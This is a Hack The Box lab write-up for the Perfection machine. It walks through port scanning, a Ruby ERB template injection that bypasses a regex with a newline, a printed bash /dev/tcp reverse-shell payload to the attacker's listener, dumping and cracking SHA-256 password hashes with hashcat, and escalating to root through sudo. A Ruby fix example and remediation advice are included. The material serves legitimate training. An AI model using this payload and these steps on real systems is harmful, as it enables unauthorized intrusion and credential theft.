Perfection HTB Writeup | HacktheBox

Introduction

In this post, you will learn how to solve the Perfection machine from Hack The Box. If you have any doubts, comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, you will be amazed, and support me by following on X.

Let’s Hack Perfection HTB 😌

https://twitter.com/HacklikeHacker

Enumeration

First, we scan the target’s IP address with Nmap to learn which TCP ports are open and which services (and versions) are listening on them.

The scan shows two open ports: 22 (SSH) and 80 (HTTP). SSH gives us a way back in later if we obtain credentials, and port 80 hosts the web application that we attack first.

The OpenSSH banner (“8.9p1 Ubuntu 3ubuntu0.6”) tells us the host is running Ubuntu, the web server identifies itself as nginx, and the page title is “Weighted Grade Calculator”. Note that the default scan covers only the 1,000 most common ports (“Not shown: 998 closed tcp ports”); a full-range scan with -p- is the usual follow-up if these two do not lead anywhere.

Now, let’s break down the command “sudo nmap -sC -sV 10.129.216.68”:

  • “sudo” runs Nmap as root, which lets it open raw sockets and use the faster SYN scan (-sS) that is the default for root; without it Nmap falls back to a full TCP connect scan.
  • “-sC” runs the default NSE scripts against each open service; here they returned the SSH host keys (ssh-hostkey) and the web page title (http-title).
  • “-sV” probes each open port to identify the service and, where possible, its exact version.
  • And finally, “10.129.216.68” is the IP address we’re targeting.
sudo nmap -sC -sV 10.129.216.68

[sudo] password for kali: 

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 21:47 CET
Nmap scan report for 10.129.216.68
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_  256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open  http    nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds

Website

The HTTP port serves the Weighted Grade Calculator, a form that takes grades, weights and category names and renders the computed result back to the user. Every one of those fields is user input that ends up in a server-rendered page. The “<%= ... %>” tags in the payload we use below are ERB, Ruby’s standard template syntax (the shell we eventually get lands in ~/ruby_app next to main.rb and a views directory), so if a field is spliced into the template rather than passed to it as data, we can get the server to execute Ruby and, via system(), shell commands.

Start Listener

Next, we set up Netcat to wait for an incoming connection with “nc -lvnp 7373”. Here, “nc” is Netcat, a general-purpose TCP/UDP tool.

The flags are -l for listen mode, -v for verbose output, -n to skip DNS resolution of the peer address (it is printed as a bare IP), and -p to pick the local port, 7373 here. The target will connect back to this port with a reverse shell, so the listener must be running before the payload is sent; the “connect to” line in the output below only appears once the injection has fired.

nc -lvnp 7373            
                
listening on [any] 7373 ...
connect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582

Generate Payload

hURL is a small encode/decode helper. We run it twice: first to Base64-encode the Bash reverse-shell one-liner, then to URL-encode the Base64 string.

The command itself, bash -i >& /dev/tcp/10.10.14.213/7373 0>&1, starts an interactive Bash with stdin, stdout and stderr attached to a TCP connection back to our listener (Bash’s /dev/tcp pseudo-device does the connecting, so no extra tooling is needed on the target). Base64 turns it into a string of only alphanumerics, “+”, “/” and “=”, so the shell metacharacters never have to survive the application’s input handling; the server reverses this with base64 -d. The URL-encoding step is needed because the Base64 output contains a “+”: in an application/x-www-form-urlencoded body a bare “+” decodes to a space, which would corrupt the Base64 and break the decode, so it has to be sent as %2B.

┌──(kali㉿kali)-[~]
└─$ hURL -B "bash -i >& /dev/tcp/10.10.14.213/7373 0>&1"

Original       :: bash -i >& /dev/tcp/10.10.14.213/7373 0>&1
base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx

┌──(kali㉿kali)-[~]
└─$ hURL -U "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx"

Original    :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx
URL ENcoded :: YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx

Inject Payload

Submit the calculator form with the browser proxied through Burp Suite, intercept the POST request, and replace its body with the payload below. Every parameter except category1 is a valid-looking filler value; category1 carries the injection and is moved to the end of the body. URL-decoded, its value is “a”, a newline (%0A), then <%= system("echo <base64> | base64 -d | bash") %>, then “1”. The <%= ... %> tags are ERB, so the server evaluates system() while rendering the result page: the Base64 is decoded back into the Bash one-liner, Bash runs it, and the reverse shell connects to our listener. The “a” plus newline in front matters: it is there to get the value past an input check on the category name. In Ruby, ^ and $ are line anchors, so a regex such as ^[a-zA-Z0-9 ]+$ (the exact check in main.rb is not shown here) is satisfied by the harmless first line alone and never examines the template tag on the second.

Payload

grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4yMTMvNzM3MyAwPiYx|+base64+-d+|+bash");%25>1
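To see what the payload above is exploiting, here is an added Ruby example, not the box’s main.rb, that models the vulnerable rendering pattern (user input spliced into the ERB source) beside the fixed version, together with a line-anchored regex filter of the kind a leading newline slips past. The filter is an assumption about the shape of the check, since the real one is not shown here, and a harmless 6 * 7 stands in for system("...").

```ruby
require 'erb'
require 'cgi'

# Added example (not the target's main.rb): a minimal model of the injection
# above and of the two fixes that stop it. The filter regex is an assumption
# about the kind of check a leading "a\n" defeats, not code from the target.

# Line-anchored check: in Ruby, ^ and $ match at every line boundary, so only
# the first line of a multi-line value has to look like a clean category name.
WEAK_CATEGORY = /^[a-zA-Z0-9\/\s]+$/
# String-anchored check: \A and \z cover the whole value and \n is not allowed.
STRICT_CATEGORY = /\A[a-zA-Z0-9\/ ]+\z/

def weak_valid?(category)
  WEAK_CATEGORY.match?(category)
end

def strict_valid?(category)
  STRICT_CATEGORY.match?(category)
end

# Vulnerable pattern: user input is spliced into the ERB *source*, so any
# <%= ... %> it carries is evaluated with the application's privileges.
def render_unsafe(category)
  source = "<p>Category: #{category}</p>"
  ERB.new(source).result(binding)
end

# Fixed pattern: the template is a constant, user input is only passed in as
# data, and it is HTML-escaped on output. Template tags in the input stay text.
SAFE_TEMPLATE = ERB.new('<p>Category: <%= CGI.escapeHTML(category) %></p>')

def render_safe(category)
  SAFE_TEMPLATE.result_with_hash(category: category)
end

# Same shape as the writeup's category1 value (a, newline, ERB tag, 1) with a
# harmless expression in place of system("...").
PROBE = "a\n<%= 6 * 7 %>1"

if __FILE__ == $PROGRAM_NAME
  puts "weak check passes:   #{weak_valid?(PROBE)}"    # true
  puts "strict check passes: #{strict_valid?(PROBE)}"  # false
  puts render_unsafe(PROBE)   # "42" appears: the tag was executed
  puts render_safe(PROBE)     # the tag comes back as escaped text
end
```

The fix has two halves that should both be applied: \A and \z so the whole value is validated rather than its first line, and a constant template with the input passed as data, so that validation is defence in depth rather than the only thing standing between a form field and eval.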

User Flag and Hash

Boom! We’ve got our reverse shell, running as the user susan. From here we read the user flag and find a SQLite database, pupilpath_credentials.db, in ~/Migration. Running strings over it dumps the users table: each row is a name immediately followed by its 64-hex-character password hash (the trailing letter on each line is adjacent record bytes that strings happened to print, not part of the hash). Susan’s hash is the one we care about, because it may be her system password too. If sqlite3 is installed on the target, querying the table directly is tidier than strings.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 7373                            
listening on [any] 7373 ...
connect to [10.10.14.213] from (UNKNOWN) [10.129.216.68] 42582
bash: cannot set terminal process group (992): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$ ls
ls
main.rb
public
views
susan@perfection:~/ruby_app$ cd /home
cd /home
susan@perfection:/home$ ls
ls
susan
susan@perfection:/home$ cd susan
cd susan
susan@perfection:~$ ls
ls
Migration
ruby_app
user.txt
susan@perfection:~$ cat user.txt
cat user.txt
2034XXXXXXXXXXXXXXXXXXXXXXX96ab
susan@perfection:~$ cd Migration
cd Migration
susan@perfection:~/Migration$ ls
ls
pupilpath_credentials.db
susan@perfection:~/Migration$ strings pupilpath_credentials.db
strings pupilpath_credentials.db
SQLite format 3
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY,
name TEXT,
password TEXT
Stephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S
David Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP
Harry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O
Tina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q
Susan Miller<HASH>

Crack the Hash

A 64-hex-character hash with no salt is most likely plain SHA-256, which is hashcat mode 1400 (-m 1400). We use a mask attack (-a 3): the mask susan_nasus_?d?d?d?d?d?d?d?d?d means the literal prefix “susan_nasus_” followed by exactly nine digits (?d is one decimal digit), a keyspace of 10^9 candidates, which matches the “1000000000” total in hashcat’s progress line. Unsalted SHA-256 is cheap to compute, so the whole space takes only minutes even on a laptop CPU; here hashcat finds the password after trying about a third of it.

┌──(kali㉿kali)-[~]
└─$ echo "<HASH>" > hash.txt

┌──(kali㉿kali)-[~]
└─$ hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

<HASH>:susan_nasus_4XXXXXXX0

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Thu Mar  7 22:22:07 2024 (2 mins, 16 secs)
Time.Estimated...: Thu Mar  7 22:24:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2614.7 kH/s (0.39ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324558848/1000000000 (32.46%)
Rejected.........: 0/324558848 (0.00%)
Restore.Point....: 324554752/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_058540610 -> susan_nasus_803824210
Hardware.Mon.#1..: Util: 32%

SSH as Susan and Escalate to Root

The cracked password is Susan’s system password as well (password reuse between the migrated credentials database and the host account), so we can SSH in as susan and get a proper TTY instead of the raw reverse shell. Susan is allowed to run sudo, so sudo su with the same password drops us into a root shell, and the root flag is in /root/root.txt.

┌──(kali㉿kali)-[~]
└─$ ssh susan@10.129.216.68
susan@perfection:~$ sudo su
root@perfection:/home/susan# cat /root/root.txt
<FLAG>

Conclusion

In summary, Perfection chains three weaknesses. A server-side template injection in the Ruby Weighted Grade Calculator: user input is rendered as ERB, and the category check can be bypassed with a leading newline because Ruby’s ^ and $ anchors are line-based, giving code execution as susan. A credentials database left behind from a migration, holding unsalted SHA-256 hashes of passwords with a predictable format, which a mask attack cracks in minutes. And password reuse plus sudo rights for susan, which turn that cracked password into root. The fixes are just as concrete: never build templates from user input (pass it as data and escape on output), anchor validation regexes with \A and \z, store passwords with a slow salted hash such as bcrypt or Argon2, delete migration artefacts, and restrict sudo to what the account actually needs.

